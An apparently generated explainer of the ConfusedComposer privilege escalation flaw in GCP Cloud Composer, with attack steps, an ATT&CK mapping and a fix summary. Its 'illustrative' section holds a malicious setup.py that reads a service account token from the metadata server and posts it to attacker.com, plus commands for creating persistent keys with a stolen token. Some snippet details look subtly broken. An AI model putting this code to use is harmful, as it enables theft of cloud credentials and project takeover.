ConfusedComposer: Demystifying Vulnerability

ConfusedComposer was a privilege escalation vulnerability discovered by Tenable Research within the Google Cloud Platform (GCP), which has since been fixed[1][2]. It allowed an attacker with permission to update a Cloud Composer environment (composer.environments.update) to escalate their privileges to the level of the default Cloud Build service account[1][2]. This default service account typically possesses broad permissions across various GCP services, including Cloud Build itself, Cloud Storage, and Artifact Registry, potentially enabling significant unauthorized actions within a GCP project[1][2].

Involved GCP Services

• Cloud Composer: A managed workflow orchestration service based on Apache Airflow, used for automating data pipelines[1][2].

• Cloud Build: A managed CI/CD service for building, testing, and deploying applications and containers[1][2]. Cloud Composer utilizes Cloud Build behind the scenes for tasks like installing Python packages[1][2].

Vulnerability Details and Attack Steps

The vulnerability exploited the interaction between Cloud Composer and Cloud Build during the installation of custom Python Package Index (PyPI) packages[2].

1. Prerequisite: The attacker obtains credentials or assumes an identity with the composer.environments.update permission for a specific Cloud Composer environment[2].

2. Malicious Package Creation: The attacker creates a custom PyPI package containing malicious code within its installation script (e.g., setup.py)[2]. This code is designed to execute during the package installation process. Python's pip tool, used by Cloud Build, automatically runs setup scripts like setup.py during installation[2][8].

3. Environment Update: The attacker modifies the target Cloud Composer environment's configuration to include their malicious PyPI package as a dependency[2].

4. Build Trigger: Cloud Composer initiates a Cloud Build process in the user's project to update the environment, which includes installing the specified PyPI packages[2]. Crucially, before the fix, this build process ran under the identity of the default Cloud Build service account, not the user initiating the update or the Composer environment's own service account[2].

5. Code Execution: When Cloud Build uses pip to install the malicious package, the code within the package's installation script (setup.py) is executed[2]. This execution occurs within the Cloud Build instance and inherits the permissions of the default Cloud Build service account[2].

6. Token Theft: The malicious script accesses the Cloud Build instance's metadata API endpoint to retrieve the access token associated with the default Cloud Build service account[2].

7. Token Exfiltration: The script sends the stolen access token to an attacker-controlled server[2].

8. Privilege Escalation: The attacker now possesses a token for the highly privileged default Cloud Build service account. They can use this token to authenticate as that service account and perform actions within the GCP project according to its permissions, potentially leading to full project compromise[2].

MITRE ATT&CK Mapping

The ConfusedComposer attack aligns with several MITRE ATT&CK tactics, particularly within the Cloud matrix[3][4][10]:

• Execution (TA0002): The core of the attack involves executing malicious code (within setup.py) by manipulating the legitimate Cloud Build process triggered by Composer[2]. This leverages a trusted system component for execution.

• Privilege Escalation (TA0004): The primary goal and outcome. The attacker abuses the composer.environments.update permission and the Composer-Build interaction to gain the higher privileges of the default Cloud Build service account[2][3][4]. This involves exploiting service permissions and interactions[11]. Relevant GCP API calls associated with privilege escalation can include composer.environments.create (related service) and various IAM manipulations post-compromise[4].

• Credential Access (TA0006): The malicious script actively steals credentials by querying the instance metadata API for the service account token[2][3][4]. This maps to T1552 (Unsecured Credentials), specifically T1552.005 (Cloud Instance Metadata API)[3].

Post-exploitation, an attacker using the stolen token might engage in:

• Discovery (TA0007): Using the token to list resources and permissions (e.g., gcloud iam service-accounts list)[4][10].

• Persistence (TA0003): Creating new keys for the compromised service account (gcloud iam service-accounts keys create) or modifying IAM policies (setIamPolicy)[4][6][10].

• Lateral Movement (TA0008): Using the service account's permissions, potentially including iam.serviceAccounts.actAs, to access or control other resources[4][10].

Potential Code Snippets and Commands (Illustrative)

While the original article doesn't provide exact code, the following illustrate the types of commands and script logic that could have been used:

• Malicious setup.py Snippet (Conceptual):

    # Simplified example within a malicious package's setup.py
    import subprocess
    import requests
    import json
    from setuptools import setup
    from setuptools.command.install import install
  
    EXFIL_URL = "http://attacker.com/log" # Attacker's server
  
    class ExploitInstall(install):
        def run(self):
            try:
                # Get token from metadata server
                cmd = 'curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" --silent'
                token_json = subprocess.check_output(cmd, shell=True).decode()
                token = json.loads(token_json).get("access_token")
  
                if token:
                    # Send token to attacker
                    requests.post(EXFIL_URL, json={'token': token})
            except Exception as e:
                 requests.post(EXFIL_URL, json={'error': str(e)}) # Exfiltrate errors too
  
            # Continue standard installation
            install.run(self)
  
    setup(
        name='malicious-composer-package',
        version='1.0.0',
        # ... other standard setup args ...
        cmdclass={'install': ExploitInstall},
    )
  

  This script uses curl via a subprocess to fetch the token from the standard GCP metadata endpoint[7] and then POSTs it to an external server.

• GCP Command to Update Environment (Attacker):

    # Attacker with composer.environments.update permission adds the package
    # Exact flag might vary; could involve patching or specific package list update flags
    gcloud composer environments update YOUR_ENV_NAME \
      --location YOUR_REGION \
      --update-pypi-packages-from-file requirements.txt \ # Assuming malicious package is added here
      --project YOUR_PROJECT_ID
  

  Or potentially using patch commands if direct package addition isn't feasible via a simple flag.

• Metadata API Access Command (Used within script):

    curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
  

  This is the standard command to retrieve the attached service account's token from within a GCP compute instance[3][7].

• Post-Exploitation Command Example (Using stolen token):

    # Attacker sets the stolen token as an environment variable
    export CLOUD_SDK_AUTH_ACCESS_TOKEN="PASTED_STOLEN_TOKEN"
  
    # Attacker uses gcloud, which now authenticates using the token,
    # potentially to create a persistent key for the compromised service account
    gcloud iam service-accounts keys create compromised-key.json \
      --iam-account="PROJECT_NUMBER-compute@developer.gserviceaccount.com" \ # Or default Cloud Build SA ID
      --project YOUR_PROJECT_ID
  

Vulnerability Fix

Google addressed this vulnerability by changing the behavior of Cloud Composer. Instead of using the potentially over-privileged default Cloud Build service account for PyPI installations during updates, Composer now uses the Composer environment's service account[2]. This aligns the permissions used for the operation with the specific environment being updated, adhering to the principle of least privilege. The fix was rolled out for new Composer instances, with existing instances scheduled to be updated by April 2025[2]. GCP also updated relevant documentation regarding permissions and access control for Composer[2].

Sources [1] ConfusedComposer: A Privilege Escalation Vulnerability Impacting GCP Composer https://www.tenable.com/blog/confusedcomposer-a-privilege-escalation-vulnerability-impacting-gcp-composer [2] ConfusedComposer: A Privilege Escalation Vulnerability Impacting GCP Composer https://www.tenable.com/blog/confusedcomposer-a-privilege-escalation-vulnerability-impacting-gcp-composer [3] What is the MITRE ATT&CK Framework for Cloud? 10 TTPs ... - Sysdig https://sysdig.com/blog/what-is-mitre-attck-for-cloud-iaas/ [4] [PDF] MITRE ATT&CK in Google Cloud Platform (GCP): | Expel https://expel.com/wp-content/uploads/2022/08/Expel-GCP-mind-map-kit-080422.pdf [5] rung/threat-matrix-cicd: Threat matrix for CI/CD Pipeline - GitHub https://github.com/rung/threat-matrix-cicd [6] Tutorial on privilege escalation and post exploitation tactics ... - GitLab https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ [7] DinoChiesa/get-gcp-access-token - GitHub https://github.com/DinoChiesa/get-gcp-access-token [8] Six Malicious Python Packages in the PyPI Targeting Windows Users https://unit42.paloaltonetworks.com/malicious-packages-in-pypi/ [9] Granting Access to Cloud Build - Impersonating a Service Account https://dev.to/tsoden/granting-access-to-cloud-build-impersonating-a-service-account-5hm [10] Understanding MITRE ATT&CK® Cloud Matrix for Security - Balbix https://www.balbix.com/insights/mitre-attck-for-cloud/ [11] Privilege Escalation in Google Cloud Platform - Part 1 (IAM) https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ [12] Privilege Escalation, Tactic TA0004 - Enterprise - MITRE ATT&CK® https://attack.mitre.org/tactics/TA0004/ [13] Valid Accounts: Cloud Accounts, Sub-technique T1078.004 https://attack.mitre.org/techniques/T1078/004/ [14] [PDF] Defending Continuous Integration/Continuous Delivery (CI/CD ... https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF [15] Using the MITRE ATT&CK Framework to Strengthen Cloud Security https://orca.security/resources/blog/leveraging-mitre-attack-framework-with-orca/ [16] Mitre ATT&CK Framework: Guide to Mapping Adversary Techniques ... https://www.micromindercs.com/blog/mitre-attack-framework-guide [17] A defender's MITRE ATT&CK cheat sheet for Google Cloud Platform ... https://expel.com/blog/mitre-attack-cheat-sheet-for-gcp/ [18] Software Deployment Tools, Technique T1072 - MITRE ATT&CK® https://attack.mitre.org/techniques/T1072/ [19] Valid Accounts, Technique T1078 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/techniques/T1078/ [20] Matrix - Enterprise - Cloud - MITRE ATT&CK® https://attack.mitre.org/matrices/enterprise/cloud/ [21] Exploitation for Privilege Escalation, Technique T1068 - Enterprise https://attack.mitre.org/techniques/T1068/ [22] Execution, Tactic TA0002 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/tactics/TA0002/ [23] Compromise Accounts: Cloud Accounts, Sub-technique T1586.003 https://attack.mitre.org/techniques/T1586/003/ [24] Escalating Privileges in Google Cloud Composer by ... - NetSPI https://www.netspi.com/blog/technical-blog/cloud-pentesting/privilege-escalation-google-cloud-composer/ [25] Access control with IAM | Cloud Composer https://cloud.google.com/composer/docs/composer-2/access-control [26] Privilege Escalation in Google Cloud Platform - Hacking The Cloud https://hackingthe.cloud/gcp/exploitation/gcp_iam_privilege_escalation/ [27] A small collection of vulnerable code snippets - GitHub https://github.com/snoopysecurity/Vulnerable-Code-Snippets [28] Authenticate workloads to Google Cloud APIs using service accounts https://cloud.google.com/compute/docs/access/authenticate-workloads [29] Malicious Python Packages and Code Execution via pip download https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/ [30] New Privilege Escalation Techniques are Compromising ... - XM Cyber https://xmcyber.com/blog/new-privilege-escalation-techniques-are-compromising-your-google-cloud-platform/ [31] Tenable Uncovers Privilege Escalation Vulnerability in Google Cloud https://www.itvoice.in/tenable-uncovers-privilege-escalation-vulnerability-in-google-cloud [32] Use Google Cloud Platform https://docs.data-community.publishing.service.gov.uk/tools/google-cloud-platform/gcp-access/ [33] Part 4. Implement token exchange between Azure and GCP in Python https://dev.to/stack-labs/multi-cloud-identity-federation-explained-part-4-implement-token-exchange-between-azure-and-gcp-in-python-1gop [34] Top 8 malicious attacks recently found on PyPI - Sonatype https://www.sonatype.com/blog/top-8-malicious-attacks-recently-found-on-pypi [35] Google Cloud Platform (GCP) Service Account-based Privilege ... https://www.praetorian.com/blog/google-cloud-platform-gcp-service-account-based-privilege-escalation-paths/ [36] MITRE ATT&CK Cloud Matrix: Use Cases, Tactics, and Sub-Matrices https://www.exabeam.com/explainers/mitre-attck/mitre-attck-cloud-matrix-use-cases-tactics-and-sub-matrices/ [37] MITRE ATT&CK Cloud Matrix v.16: New Techniques & Why You ... https://www.mitigant.io/en/blog/mitre-att-ck-cloud-matrix-v-16-new-techniques-why-you-should-care-part-i [38] Cloud Permissions & MITRE ATT&CK | CSA https://cloudsecurityalliance.org/articles/powerful-cloud-permissions-you-should-know-part-2 [39] Detecting MITRE ATT&CK: Privilege escalation with Falco | Sysdig https://sysdig.com/blog/mitre-privilege-escalation-falco/ [40] 10 Malicious Code Examples You Need to Recognize to Defend ... https://www.jit.io/resources/app-security/10-malicious-code-examples-you-need-to-recognize-to-defend-your-sdlc [41] Is it possible to use gcloud with an access token? - Reddit https://www.reddit.com/r/googlecloud/comments/ntebvd/is_it_possible_to_use_gcloud_with_an_access_token/ [42] GCP Cloud Composer Bug Let Attackers Elevate Access via ... https://thehackernews.com/2025/04/gcp-cloud-composer-bug-let-attackers.html